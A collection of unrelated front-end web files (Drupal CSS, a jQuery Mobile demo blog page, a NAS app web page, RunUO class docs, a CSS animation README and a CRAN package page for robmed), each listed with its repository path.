.drupal_wall .edit_delete {
text-align: right;
width: 100%;
position: absolute;
}
.drupal_wall .edit_delete img {
padding: 0;
border-radius: none;
box-shadow: none;
}
.drupal_wall .wallContent_left {
float: left;
}
.drupal_wall .wallContent_right {
width: 78%;
float: left;
margin-left: 10px;
padding: 0px 5px 5px 5px;
margin-right: 5px;
font-size: 13px;
line-height: 1.38;
}
.drupal_wall .headline {
color: gray;
}
.drupal_wall .photo_status {
margin-bottom: 10px;
}
.drupal_wall .video_status {
background: white;
display: inline-block;
padding: 4px 4px 2px 4px;
-webkit-box-shadow: #858585 1px 1px 4px;
-moz-box-shadow: #858585 1px 1px 4px;
box-shadow: #858585 1px 1px 4px;
margin-bottom: 12px;
}
.drupal_wall .caption {
width: 100%;
float: none;
color: gray;
margin-top: 1px;
font-size: 11px;
}
.drupal_wall .userContent {
padding: 5px 0 5px 0;
width: 100%;
font-size: 13px;
line-height: 15pt;
font-weight: normal;
}
.drupal_wall .likes {
float: left;
width: 95%;
background: #edeff4 url('../images/likes-icon.png') scroll 10px 5px no-repeat;
padding: 5px 5px 5px 33px;
margin: 5px 5px 2px 0;
font-size: 11px;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
-ms-border-radius: 3px;
-o-border-radius: 3px;
border-radius: 3px;
}
.drupal_wall .like_comment {
width: 70px;
background: url('../images/likes-icon.png') scroll 7px 0px no-repeat;
padding: 0px 0 0 25px;
color: #3b5998;
}
.drupal_wall .commentView {
float: left;
width: 95%;
background: #edeff4 url('../images/comment-icon.png') scroll 10px 7px no-repeat;
padding: 5px 5px 5px 33px;
margin-bottom: 2px;
font-size: 11px;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
-ms-border-radius: 3px;
-o-border-radius: 3px;
border-radius: 3px;
}
.drupal_wall .comment {
background: #edeff4;
margin-bottom: 2px;
padding: 7px;
float: left;
width: 100%;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
-ms-border-radius: 3px;
-o-border-radius: 3px;
border-radius: 3px;
}
.drupal_wall .comment_left {
float: left;
width: 45px;
}
.drupal_wall .comment_right {
float: left;
padding-left: 10px;
width: 83%;
}
.drupal_wall .comment_delete {
text-align: right;
width: 70%;
position: absolute;
}
.drupal_wall .delete_btn {
background: none;
padding: 0;
margin: 0 10px 0 0;
border: none;
}
.drupal_wall .comment textarea {
resize: none;
min-width: 250px;
max-width: 400px;
min-height: 40px;
max-height: 40px;
overflow-y: auto;
overflow: -moz-auto-vertical;
}
.drupal_wall_post_status .post_btn {
background-color: transparent;
background-image: url(../images/blue-button.png);
background-repeat: no-repeat;
background-position: 0 0;
border: 1px solid #fff;
color: #fff;
cursor: pointer;
font-size: 14px;
font-weight: normal;
margin: 3px 10px 3px 0;
outline: 1px solid #9babb0;
padding: 4px 16px;
-webkit-background-size: 100% 200%;
-moz-background-size: 100% 200%;
background-size: 100% 200%;
border-radius: 4px;
}
.drupal_wall_post_status .post_btn:hover {
background-image: url(../images/blue-button.png);
}
.drupal_wall_outer .status_msg {
padding: 10px;
color: gray;
float: left;
}
|
public/tags/c++/page/1/index.html | knausb/knausb.github.io | <!DOCTYPE html><html><head><title>https://knausb.github.io/tags/c++/</title><link rel="canonical" href="https://knausb.github.io/tags/c++/"/><meta name="robots" content="noindex"><meta charset="utf-8" /><meta http-equiv="refresh" content="0; url=https://knausb.github.io/tags/c++/" /></head></html> |
demo/jqm/index20141103.html | hkoudai/bbb | <!DOCTYPE html>
<html class="">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1"><!--手机设备声明-->
<title>Jquery Mobile教程</title>
<link rel="stylesheet" href="http://fonts.useso.com/css?family=Open+Sans:300,400,700">
<link rel="stylesheet" href="css/themes/default/jquery.mobile-1.4.4.min.css">
<link rel="stylesheet" href="css/themes/blog/jquery.mobile.blog.theme.css">
<link rel="stylesheet" href="font-awesome-4.2.0/css/font-awesome.min.css">
<script src="js/jquery.min.js"></script>
<script src="js/jquery.mobile-1.4.4.min.js"></script>
<script id="panel-init">
<!--pannel 必须初始化-->
$(function() {
$( "body>[data-role='panel']" ).panel();
});
</script>
</head>
<body >
<div data-role="page" id="main">
<!--Toolbar header-->
<header data-role="header" data-theme="b">
<a href="#leftpanel3" data-role="none" class="ui-btn-right ui-btn fa fa-list ui-btn-active" >
</a>
<h1 data-role="title" >
<img src="image/logo.png" style="width:16px;" class="" alt=""/>
点点滴滴
</h1>
</header>
<form class="ui-search">
<a href="#search" data-transition="slide" >
<input class="ui-page-margin" onclick="document.getElementById('search-input').focus();" type="search" value="" placeholder="搜索" >
</a>
</form>
<ul data-role="listview" class="a_list ui-page-margin">
<li>
<a rel='external' href="article_contents.html" class="j-bg ui-btn">
<div class="comments"></div>
<div class="date-circle"></div>
<h5 class="a_title">WordPress淡色系主题『Weisay Simple』</h5>
<span class="a_list_span"><i class="fa fa-clock-o"></i>2014-02-29</span>
<span class="a_list_span"><i class="fa fa-eye"></i>99</span>
<span class="a_list_span ui-block-a a_list_tag">
<i class="fa fa-tag"></i>
<span>css</span>
<span>css3</span>
<span>html5</span>
<span>html5</span>
<span>html5</span>
<span>html5</span>
<span>html5</span>
</span>
</a>
</li>
<li>
<a href="#" class="c-bg ui-btn">
<div class="comments"></div>
<div class="date-circle"></div>
<h6 class="a_title">WordPress淡色系主题『Weisay Simple』</h6>
<span class="a_list_span"><i class="fa fa-clock-o"></i>2014/02/29</span>
<span class="a_list_span"><i class="fa fa-eye"></i>99</span>
<span class="a_list_span ui-block-a a_list_tag">
<i class="fa fa-tag"></i>
<span>css</span>
<span>css3</span>
<span>html5</span>
</span>
</a>
</li>
<li>
<a href="#" class="jq-bg ui-btn">
<div class="comments"></div>
<div class="date-circle"></div>
<h6 class="a_title">WordPress淡色系主题『Weisay Simple』</h6>
<span class="a_list_span"><i class="fa fa-clock-o"></i>2014/02/29</span>
<span class="a_list_span"><i class="fa fa-eye"></i>99</span>
<span class="a_list_span ui-block-a a_list_tag">
<i class="fa fa-tag"></i>
<span>css</span>
<span>css3</span>
<span>html5</span>
</span>
</a>
</li>
<li>
<a href="#" class="jqm-bg ui-btn">
<div class="comments"></div>
<div class="date-circle"></div>
<h6 class="a_title">WordPress淡色系主题『Weisay Simple』</h6>
<span class="a_list_span"><i class="fa fa-clock-o"></i>2014/02/29</span>
<span class="a_list_span"><i class="fa fa-eye"></i>99</span>
<span class="a_list_span ui-block-a a_list_tag">
<i class="fa fa-tag"></i>
<span>css</span>
<span>css3</span>
<span>html5</span>
</span>
</a>
</li>
<li>
<a href="#" class="c3-bg ui-btn">
<div class="comments"></div>
<div class="date-circle"></div>
<h6 class="a_title">WordPress淡色系主题『Weisay Simple』</h6>
<span class="a_list_span"><i class="fa fa-clock-o"></i>2014/02/29</span>
<span class="a_list_span"><i class="fa fa-eye"></i>99</span>
<span class="a_list_span ui-block-a a_list_tag">
<i class="fa fa-tag"></i>
<span>css</span>
<span>css3</span>
<span>html5</span>
</span>
</a>
</li>
<li>
<a href="#" class="h5-bg ui-btn">
<div class="comments"></div>
<div class="date-circle"></div>
<h6 class="a_title">WordPress淡色系主题『Weisay Simple』</h6>
<span class="a_list_span"><i class="fa fa-clock-o"></i>2014/02/29</span>
<span class="a_list_span"><i class="fa fa-eye"></i>99</span>
<span class="a_list_span ui-block-a a_list_tag">
<i class="fa fa-tag"></i>
<span>css</span>
<span>css3</span>
<span>html5</span>
</span>
</a>
</li>
<li>
<a href="#" class="php-bg ui-btn">
<div class="comments"></div>
<div class="date-circle"></div>
<h6 class="a_title">WordPress淡色系主题『Weisay Simple』</h6>
<span class="a_list_span"><i class="fa fa-clock-o"></i>2014/02/29</span>
<span class="a_list_span"><i class="fa fa-eye"></i>99</span>
<span class="a_list_span ui-block-a a_list_tag">
<i class="fa fa-tag"></i>
<span>css</span>
<span>css3</span>
<span>html5</span>
</span>
</a>
</li>
</ul>
<!--Toolbar footer-->
<footer data-role="footer" data-position="fixed"><!--Toolbar Fixed position-->
<!-- <div data-role="navbar" data-iconpos="left">
<ul>
<li><a data-icon="home" >One</a></li>
<li><a data-icon="grid" >Two</a></li>
<li><a data-icon="search" >Three</a></li>
</ul> -->
</div>
</footer>
</div>
<div data-role="page" id="search">
<header data-role="header" data-theme="b">
<!--button icon-->
<a href="#main" data-rel="back" class="ui-btn-left ui-btn fa fa-angle-left" style="border:0;">
</a>
<a href="#leftpanel3" class="ui-btn-right ui-btn fa fa-list" style="border:0;">
</a>
<h1 data-role="title" >随搜随show</h1>
</header>
<form class="ui-search">
<input type="search" name="search-1" id="search-input" value="" placeholder="搜索" >
</form>
<!--listview autocomplete-->
<ul class="ui-page-margin" data-role="listview" data-inset="true" data-filter="true" data-filter-reveal="true" data-input="#search-input">
<li><a href="#">Acura</a></li>
<li><a href="#">Audi</a></li>
<li><a href="#">BMW</a></li>
<li><a href="#">Cadillac</a></li>
<li><a href="#">Chrysler</a></li>
<li><a href="#">Dodge</a></li>
<li><a href="#">Ferrari</a></li>
<li><a href="#">Ford</a></li>
<li><a href="#">GMC</a></li>
<li><a href="#">Honda</a></li>
<li><a href="#">Hyundai</a></li>
<li><a href="#">Infiniti</a></li>
<li><a href="#">Jeep</a></li>
<li><a href="#">Kia</a></li>
<li><a href="#">Lexus</a></li>
<li><a href="#">Mini</a></li>
<li><a href="#">Nissan</a></li>
<li><a href="#">Porsche</a></li>
<li><a href="#">Subaru</a></li>
<li><a href="#">Toyota</a></li>
<li><a href="#">Volkswagen</a></li>
<li><a href="#">Volvo</a></li>
</ul>
<div class="ui-tags ui-page-margin">
<a class="tag_a blue" href="#">JS<span class="tag_span">4</span></a>
<a class="tag_a green" href="#">HTML5<span class="tag_span">8</span></a>
<a class="tag_a" href="#">Jquery Mobile<span class="tag_span">15</span></a>
<a class="tag_a" href="#">PHP<span class="tag_span">16</span></a>
<a class="tag_a" href="#">CSS3<span class="tag_span">16</span></a>
<a class="tag_a" href="#">性能<span class="tag_span">16</span></a>
</div>
</div>
<!-- leftpanel3 -->
<div data-role="panel" id="leftpanel3" data-position="left" data-display="overlay" data-theme="a">
<ul class="ui-listview">
<li class="ui-first-child"><a href="#" class="ui-btn">Javascript</a></li>
<li><a href="#" class="ui-btn">Jquery</a></li>
<li><a href="#" class="ui-btn">Jquery Mobile</a></li>
<li><a href="#" class="ui-btn">HTML5</a></li>
<li><a href="#" class="ui-btn">CSS3</a></li>
<li><a href="#" class="ui-btn">CSS</a></li>
<li><a href="#" class="ui-btn">PHP</a></li>
<li><a href="#" class="ui-btn">MYSQL</a></li>
</ul>
</div><!-- /leftpanel3 -->
</body>
</html>
|
sites/all/modules/custom/socialicon_field/css/social_icons_buttons.css | vhinrich/vhinandrich2 | .node ul.social-icons-list{
display: block;
list-style: none;
padding: 0;
margin: 0;
}
.node ul.social-icons-list li{
display: inline;
}
|
releases/sources/PulseAudio/web/index.html | vansatchen/dlink327 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<link rel="stylesheet" type="text/css" href="/web/css/style.css">
<link rel="stylesheet" type="text/css" href="/web/css/button_style.css">
<link rel="stylesheet" type="text/css" href="/web/css/application.css">
<link rel="stylesheet" type="text/css" href="./css/custom.css">
<!-- jQuery lib -->
<script language="javascript" src="./js/jQuery/jquery.js?v=1.6.1"></script>
<script language="javascript" src="./js/jQuery/jquery.tools.min.js"></script>
<!-- niftycube -->
<link rel="stylesheet" type="text/css" href="./js/NiftyCube/niftyCorners.css">
<script language="javascript" src="./js/NiftyCube/niftycube.js"></script>
<!-- curvycorners -->
<script language="javascript" src="./js/curvycorners-2.0.4/curvycorners.src.js"></script>
<!-- jAlerts -->
<link rel="STYLESHEET" type="text/css" href="/web/jquery/alerts/jquery.alerts.css">
<script language="javascript" src="/web/jquery/alerts/jquery.alerts.js"></script>
<script>
var sys_time = (new Date()).getTime();
document.write("<script language=\"javascript\" src=\"\/web\/function\/function.js?id="+sys_time+"\"><\/script>");
document.write("<script language=\"javascript\" src=\"\/web\/function\/init.js?id="+sys_time+"\"><\/script>");
document.write("<script language=\"javascript\" src=\"\/web\/function\/position.js?id="+sys_time+"\"><\/script>");
document.write("<script language=\"javascript\" src=\".\/js/PulseAudio.js?id="+sys_time+"\"><\/script>");
</script>
<script>
$(document).ready(function()
{
//get banner html
get_application_banner();
//show login user name
show_login_user();
displayScreenSize(0);
//menu link
init_menu_link();
load_help("/PulseAudio/help_PulseAudio.html");
link_url();
$("#help_icon").click(function(){
applications_help();
});
});
</script>
</head>
<body background="/web/images/bg.png" topmargin="0" leftmargin="0" bgcolor="#DDDFE0" onresize="javascript:displayScreenSize(1);" >
<div class="overlay" id="overlay">
<div id="id_result" style="display:none">
<div id="progressbar" style="width:200px;margin-top:150px"></div>
<div id="id_percentage">0%</div>
</div>
</div>
<div id="tooltip" class="tooltip overlay_tooltip"></div>
<div id="dialog_overlay" class="dialog_overlay"><div id="share_info" align="center"></div></div>
<div id="banner" class="banner">
<div style="right:20px; top:10px" id="login_user" class="login_user"></div>
</div>
<div id="title_right"></div><!--right corner-->
<div id="title_left"></div><!-- left corner -->
<div id="title_banner" class="title_banner"><div id="title_div">PulseAudio</div></div>
<div id="sub_menu" class="sub_menu">
<ul id="menu_container" style="overflow-x: hidden;overflow-y:hidden;overflow;">
<li><div id="apkg" src="help_PulseAudio.html" rel="PulseAudio_sub.html" class="sidenavoff"> Launch</div></li>
<li><div> </div></li>
<li><div> </div></li>
<li><div> </div></li>
<li><div> </div></li>
<li><div> </div></li>
<li><div> </div></li>
</ul>
</div>
<!--<div id="sub_menu_bottom"></div>-->
<div id="sub_menu_bottom_right"></div>
<div id="main_container">
<iframe id="mainFrame" name="mainFrame" frameborder='0' width="100%" height="350" src="PulseAudio_sub.html" scrolling="yes"></iframe>
<div id="main_button" style="height:42px;position:absolute;margin-bottom:0px;margin-left:0px;width:100%;"></div>
</div>
<div id="diagFrame" width="0" height="0" frameborder="0" style="display:none"></div>
<div id="help_div" class="help_div help_show" style="display:">
<iframe id="helpFrame" name="helpFrame" frameborder='0' width="100%"></iframe>
</div>
<!--<div id="move_icon" style="display:none"><img border="0" src="/web/images/arrow_right.png" width="10" height="10"></div>-->
<div id="help_icon"><img border="0" src="/web/images/management/help.png" width="16" height="16"></div>
<div id="s_logo"><img border="0" src="/web/images/logo2.png"></div>
</body>
<head>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
</html>
|
docs/types/Minotaur.html | alucardxlx/caoticamente-shards | <html>
<head>
<title>RunUO Documentation - Class Overview - Minotaur</title>
</head>
<body bgcolor="white" style="font-family: Courier New" text="#000000" link="#000000" vlink="#000000" alink="#808080">
<h4><a href="../namespaces/Server.Mobiles.html">Back to Server.Mobiles</a></h4>
<h2>Minotaur : <!-- DBG-1 --><a href="BaseCreature.html">BaseCreature</a>, <!-- DBG-2.2 --><a href="IEntity.html">IEntity</a>, <!-- DBG-2.2 --><a href="IPoint3D.html">IPoint3D</a>, <!-- DBG-2.2 --><a href="IPoint2D.html">IPoint2D</a>, <!-- DBG-2.1 --><font color="blue">IComparable</font>, <!-- DBG-2.1 --><font color="blue">IComparable</font><<a href="IEntity.html">IEntity</a>>, <!-- DBG-2.2 --><a href="IHued.html">IHued</a>, <!-- DBG-2.1 --><font color="blue">IComparable</font><<a href="Mobile.html">Mobile</a>>, <!-- DBG-2.2 --><a href="ISerializable.html">ISerializable</a>, <!-- DBG-2.2 --><a href="IHonorTarget.html">IHonorTarget</a></h2>
(<font color="blue">ctor</font>) Minotaur()<br>
(<font color="blue">ctor</font>) Minotaur( <!-- DBG-0 --><a href="Serial.html">Serial</a> serial )<br>
<font color="blue">virtual</font> <font color="blue">void</font> Deserialize( <!-- DBG-0 --><a href="GenericReader.html">GenericReader</a> reader )<br>
<font color="blue">virtual</font> <font color="blue">void</font> GenerateLoot()<br>
<font color="blue">virtual</font> <font color="blue">int</font> GetAngerSound()<br>
<font color="blue">virtual</font> <font color="blue">int</font> GetAttackSound()<br>
<font color="blue">virtual</font> <font color="blue">int</font> GetDeathSound()<br>
<font color="blue">virtual</font> <font color="blue">int</font> GetHurtSound()<br>
<font color="blue">virtual</font> <font color="blue">int</font> GetIdleSound()<br>
<font color="blue">virtual</font> <font color="blue">void</font> Serialize( <!-- DBG-0 --><a href="GenericWriter.html">GenericWriter</a> writer )<br>
</body>
</html>
|
readme_files/css/60-readme.html | lalo/readme-fads | <div class="announce instapaper_body md" data-path="README.md" id="readme"><article class="markdown-body entry-content" itemprop="mainContentOfPage"><h1>
<a name="user-content-magic" class="anchor" href="#magic" aria-hidden="true"><span class="octicon octicon-link"></span></a>magic</h1>
<p>CSS3 Animations with special effects. Now on beta, more effects coming soon. Many thanks to <a href="http://daneden.me/animate/">daneden</a> for inspiration!
My next step is to minifing the code.
Take a look at the demo <a href="http://minimamente.com/example/magic_animations/">NEW DEMO PAGE</a></p>
<h2>
<a name="user-content-installation" class="anchor" href="#installation" aria-hidden="true"><span class="octicon octicon-link"></span></a>Installation</h2>
<p>Include the CSS style: magic.css
or
include the mynified version: magic.min.css</p>
<p>Example:</p>
<div class="highlight highlight-html"><pre><span class="nt"><link</span> <span class="na">rel=</span><span class="s">"stylesheet"</span> <span class="na">href=</span><span class="s">"yourpath/magic.css"</span><span class="nt">></span>
</pre></div>
<h2>
<a name="user-content-usage" class="anchor" href="#usage" aria-hidden="true"><span class="octicon octicon-link"></span></a>Usage</h2>
<p>This is a sample code on hover with jQuery, first you include the class "magictime" and after your desired animation.</p>
<div class="highlight highlight-js"><pre><span class="nx">$</span><span class="p">(</span><span class="s1">'.yourdiv'</span><span class="p">).</span><span class="nx">hover</span><span class="p">(</span><span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="nx">$</span><span class="p">(</span><span class="k">this</span><span class="p">).</span><span class="nx">addClass</span><span class="p">(</span><span class="s1">'magictime puffIn'</span><span class="p">);</span>
<span class="p">});</span>
</pre></div>
<p>If you want to load the animation after certain time, you can use this example:</p>
<div class="highlight highlight-js"><pre><span class="c1">//set timer to 5 seconds, after that, load the magic animation</span>
<span class="nx">setTimeout</span><span class="p">(</span><span class="kd">function</span><span class="p">(){</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'.yourdiv'</span><span class="p">).</span><span class="nx">addClass</span><span class="p">(</span><span class="s1">'magictime puffIn'</span><span class="p">);</span>
<span class="p">},</span> <span class="mi">5000</span><span class="p">);</span>
</pre></div>
<p>If you want to load the animation after certain time but with infinite loop, you can use this example:</p>
<div class="highlight highlight-js"><pre><span class="c1">//set timer to 3 seconds, after that, load the magic animation and repeat forever</span>
<span class="nx">setInterval</span><span class="p">(</span><span class="kd">function</span><span class="p">(){</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'.yourdiv'</span><span class="p">).</span><span class="nx">toggleClass</span><span class="p">(</span><span class="s1">'magictime puffIn'</span><span class="p">);</span>
<span class="p">},</span> <span class="mi">3000</span> <span class="p">);</span>
</pre></div>
<p>You can change the time of the animation by set the class "magictime" for example:</p>
<div class="highlight highlight-css"><pre><span class="nc">.magictime</span> <span class="p">{</span>
<span class="o">-</span><span class="n">webkit</span><span class="o">-</span><span class="n">animation</span><span class="o">-</span><span class="n">duration</span><span class="o">:</span> <span class="m">3s</span><span class="p">;</span>
<span class="o">-</span><span class="n">moz</span><span class="o">-</span><span class="n">animation</span><span class="o">-</span><span class="n">duration</span><span class="o">:</span> <span class="m">3s</span><span class="p">;</span>
<span class="o">-</span><span class="n">o</span><span class="o">-</span><span class="n">animation</span><span class="o">-</span><span class="n">duration</span><span class="o">:</span> <span class="m">3s</span><span class="p">;</span>
<span class="n">animation</span><span class="o">-</span><span class="n">duration</span><span class="o">:</span> <span class="m">3s</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
<p>Default CSS timing is:</p>
<div class="highlight highlight-css"><pre><span class="nc">.magictime</span> <span class="p">{</span>
<span class="o">-</span><span class="n">webkit</span><span class="o">-</span><span class="n">animation</span><span class="o">-</span><span class="n">duration</span><span class="o">:</span> <span class="m">1s</span><span class="p">;</span>
<span class="o">-</span><span class="n">moz</span><span class="o">-</span><span class="n">animation</span><span class="o">-</span><span class="n">duration</span><span class="o">:</span> <span class="m">1s</span><span class="p">;</span>
<span class="o">-</span><span class="n">o</span><span class="o">-</span><span class="n">animation</span><span class="o">-</span><span class="n">duration</span><span class="o">:</span> <span class="m">1s</span><span class="p">;</span>
<span class="n">animation</span><span class="o">-</span><span class="n">duration</span><span class="o">:</span> <span class="m">1s</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
<p>If you want to assign the timing to a specific animation, you can use that code (use 2 class):</p>
<div class="highlight highlight-css"><pre><span class="nc">.magictime.magic</span> <span class="p">{</span>
<span class="o">-</span><span class="n">webkit</span><span class="o">-</span><span class="n">animation</span><span class="o">-</span><span class="n">duration</span><span class="o">:</span> <span class="m">10s</span><span class="p">;</span>
<span class="o">-</span><span class="n">moz</span><span class="o">-</span><span class="n">animation</span><span class="o">-</span><span class="n">duration</span><span class="o">:</span> <span class="m">10s</span><span class="p">;</span>
<span class="o">-</span><span class="n">o</span><span class="o">-</span><span class="n">animation</span><span class="o">-</span><span class="n">duration</span><span class="o">:</span> <span class="m">10s</span><span class="p">;</span>
<span class="n">animation</span><span class="o">-</span><span class="n">duration</span><span class="o">:</span> <span class="m">10s</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
<h2>
<a name="user-content-bower-installation" class="anchor" href="#bower-installation" aria-hidden="true"><span class="octicon octicon-link"></span></a>Bower Installation</h2>
<pre><code>bower install magic
</code></pre></article></div> |
color/colors.css | rafaqz/growshare_corolla |
/* Background */
body {
background-color: #ccc;
}
body.corolla .color-form {
max-width: 100%;
}
#content-wrapper,
.breadcrumb-wrapper,
#messages-help-wrapper,
#header-wrapper {
background-color: #fffffd;
}
#tertiary-panels-wrapper,
#footer-panels-wrapper {
background-color: #aaaaa9;
}
.panel-pane {
background-color: #f0f0ee;
}
.pane-node-field-image {
background-color: #fffffd;
}
/* Text */
body,
#site-name a,
h1.page-title,
.node h2.node-title,
.node h1.node-title a,
.node h2.node-title a,
.comment h3.comment-title a,
.tabs ul.tabs li a,
pre,
code,
samp,
var,
table.update tr,
table.system-status-report tr {
color: #331e11;
}
#site-name a::-moz-selection {
background-color: #2e2e2e;
}
#site-name a::selection {
background-color: #2e2e2e;
}
.node-title a::-moz-selection {
background-color: #2e2e2e;
}
.node-title a::selection {
background-color: #2e2e2e;
}
/* Links */
a,
a.active,
li a.active {
color: #E25402;
}
legend {
background-color: #ea9712;
color: #fff;
}
/* Link hovered */
a:hover,
a:focus,
a.active:hover,
a.active:focus,
li a.active:hover,
li a.active:focus {
color: #e25401;
}
.node h1.node-title a:hover,
.node h2.node-title a:hover {
color: #e25401;
}
/* Menu bar */
#menu-bar-wrapper {
background: #331E11;
color: #fff;
}
.nav .block-menu ul li a,
.nav .block-menu ul li a:visited {
color: #fcfcfc;
}
.nav .block-menu ul a:focus,
.nav .block-menu ul a:hover,
.nav .block-menu ul a:active,
.nav .block-menu ul a:visited {
background: #e25402;
}
.nav .block-menu ul li a.active {
color: #563500;
background-color: #f8f8f8;
}
/* Region header menus */
.region-header .block-menu li a,
.region-header .sf-depth-1 > a {
border-bottom: 3px solid #c4c4c4;
}
.region-header .block-menu ul li a,
.region-header .block-menu ul li a:visited {
color: #2e2e2d;
}
.region-header .block-menu li a:hover,
.region-header .block-menu li a:focus,
.region-header .block-menu li a:active {
color: #fcfcfc !important;
border-color: #2e2e2d !important;
background-color: #e25402;
}
.region-header .sf-depth-1 > a:hover,
.region-header .sf-depth-1 > a:focus {
border-color: #2e2e2d !important;
}
.region-header .sf-menu.sf-style-default .active-trail.sf-depth-1,
.region-header .sf-menu.sf-style-default .sf-depth-1 > a.active {
color: #fcfcfc;
background-color: #e25402;
}
.region-header .sf-menu.sf-style-default li li a,
.region-header .sf-menu.sf-style-default li li a:visited {
color: #fcfcfc;
border: 0 !important;
}
/* Tabs */
ul.primary li a,
ul.primary li a:hover,
ul.primary li a:focus {
border-style: solid;
border: 1px solid #c4c4c4;
border:
}
ul.primary li.active a {
border-style: none;
}
ul.primary li.active a:hover,
ul.primary li.active a:focus {
background-color: #bbb;
}
/* Form inputs */
input.form-select,
input.form-text,
input.form-submit {
border: 1px solid #c4c4c4;
}
.form-text:focus,
.form-checkbox:focus,
.form-radio:focus,
.form-select:focus {
background: #ddd;
}
textarea:focus {
background: #fff;
}
#autocomplete ul {
background: #fff;
color: #2e2e2e;
}
#autocomplete ul div:hover {
background: #2e2e2e;
color: #fff;
}
/* Slogan */
#site-slogan {
color: #e25400;
}
#site-slogan::selection {
background-color: #e25400;
}
#site-slogan::-moz-selection {
background-color: #e25400;
}
/* Poll */
.poll .bar .foreground {
background-color: #e25400 !important;
}
.block-poll .poll .percent {
color: #fff;
}
/* Border (gray) */
.content-style {
/* border: 1px solid #e1e1e1;*/
}
/* Region block borders (uncomment to enable).
The rounded corners are already accounted for in corolla.settings.style.css */
/*
.sidebar .block-inner,
.region-highlighted .block-inner,
.four-4x25 .block-inner,
.three-3x33 .block-inner {
border: 1px solid #e1e1e1;
padding: 10px;
}
*/
/* Border strong (dark gray) */
#sidebar-first input,
#sidebar-second input {
border: 1px solid #c4c4c4;
}
.tabs ul.tabs li a {
border: 1px solid #c4c4c4;
}
/* Verticle tabs */
ul.vertical-tabs-list li a {
background-color: #f5f4f3;
}
/* Block title */
.block h2,
h2 {
color: #496854;
}
.block h2::selection {
color: #fff;
background-color: #496854;
}
.block h2::-moz-selection {
background-color: #496854;
color: #fff;
}
/* Fieldset */
fieldset {
background-color: none;
}
/* Fieldset border */
fieldset {
border: none;
}
/*breadcrumbs*/
#breadcrumb a {
}
#breadcrumb a:hover,a:focus,a.active:hover, a.active:focus {
}
|
Code/GetMetaDataFromCRAN/raw_html/robmed.html | esander91/NamespacePollution | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CRAN - Package robmed</title>
<link rel="stylesheet" type="text/css" href="../../CRAN_web.css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="citation_title" content="(Robust) Mediation Analysis [R package robmed version 0.1.1]" />
<meta name="citation_author" content="Andreas Alfons" />
<meta name="citation_publication_date.Published" content="2016-09-14" />
<meta name="citation_public_url" content="https://CRAN.R-project.org/package=robmed" />
<meta name="DC.identifier" content="https://CRAN.R-project.org/package=robmed" />
<meta name="DC.publisher" content="Comprehensive R Archive Network (CRAN)" />
<style type="text/css">
table td { vertical-align: top; }
</style>
</head>
<body>
<h2>robmed: (Robust) Mediation Analysis</h2>
<p>Perform mediation analysis via a bootstrap test.</p>
<table summary="Package robmed summary">
<tr>
<td>Version:</td>
<td>0.1.1</td>
</tr>
<tr>
<td>Depends:</td>
<td>R (≥ 3.2.0), <a href="../ggplot2/index.html">ggplot2</a> (≥ 0.9.3)</td>
</tr>
<tr>
<td>Imports:</td>
<td><a href="../boot/index.html">boot</a> (≥ 1.3-1)</td>
</tr>
<tr>
<td>Published:</td>
<td>2016-09-14</td>
</tr>
<tr>
<td>Author:</td>
<td>Andreas Alfons [aut, cre]</td>
</tr>
<tr>
<td>Maintainer:</td>
<td>Andreas Alfons <alfons at ese.eur.nl></td>
</tr>
<tr>
<td>License:</td>
<td><a href="../../licenses/GPL-2">GPL-2</a> | <a href="../../licenses/GPL-3">GPL-3</a> [expanded from: GPL (≥ 2)]</td>
</tr>
<tr>
<td>NeedsCompilation:</td>
<td>no</td>
</tr>
<tr>
<td>Materials:</td>
<td><a href="NEWS">NEWS</a> </td>
</tr>
<tr>
<td>CRAN checks:</td>
<td><a href="../../checks/check_results_robmed.html">robmed results</a></td>
</tr>
</table>
<h4>Downloads:</h4>
<table summary="Package robmed downloads">
<tr>
<td> Reference manual: </td>
<td> <a href="robmed.pdf"> robmed.pdf </a> </td>
</tr>
<tr>
<td> Package source: </td>
<td> <a href="../../../src/contrib/robmed_0.1.1.tar.gz"> robmed_0.1.1.tar.gz </a> </td>
</tr>
<tr>
<td> Windows binaries: </td>
<td> r-devel: <a href="../../../bin/windows/contrib/3.5/robmed_0.1.1.zip">robmed_0.1.1.zip</a>, r-release: <a href="../../../bin/windows/contrib/3.4/robmed_0.1.1.zip">robmed_0.1.1.zip</a>, r-oldrel: <a href="../../../bin/windows/contrib/3.3/robmed_0.1.1.zip">robmed_0.1.1.zip</a> </td>
</tr>
<tr>
<td> OS X El Capitan binaries: </td>
<td> r-release: <a href="../../../bin/macosx/el-capitan/contrib/3.4/robmed_0.1.1.tgz">robmed_0.1.1.tgz</a> </td>
</tr>
<tr>
<td> OS X Mavericks binaries: </td>
<td> r-oldrel: <a href="../../../bin/macosx/mavericks/contrib/3.3/robmed_0.1.1.tgz">robmed_0.1.1.tgz</a> </td>
</tr>
<tr>
<td> Old sources: </td>
<td> <a href="../../../src/contrib/Archive/robmed"> robmed archive </a> </td>
</tr>
</table>
<h4>Linking:</h4>
<p>Please use the canonical form
<a href="https://CRAN.R-project.org/package=robmed"><samp>https://CRAN.R-project.org/package=robmed</samp></a>
to link to this page.</p>
</body>
</html>
|
